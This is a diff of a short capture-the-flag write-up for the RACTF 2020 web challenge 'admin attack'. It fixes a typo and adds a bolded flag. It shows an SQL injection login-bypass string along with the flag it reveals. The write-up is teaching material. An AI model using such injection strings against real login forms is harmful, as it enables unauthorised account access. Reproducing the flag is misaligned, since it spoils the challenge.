crypt0n1te/Write-Ups/ractf-2020/web/admin attack.md

 `'OR 1=1 LIMIT 1 OFFSET 1;--`

-When we try the above example, we succcessfully login and are greeted by the flag like so:
+When we try the above example, we successfully login and are greeted by the flag like so:
 ```
 Welcome, jimmyTehAdmin
 ractf{!!!4dm1n4buse!!!}
 ```

+**ractf{!!!4dm1n4buse!!!}**

 > Created by Christopher Harris (cjharris18) on the 8th June 2020.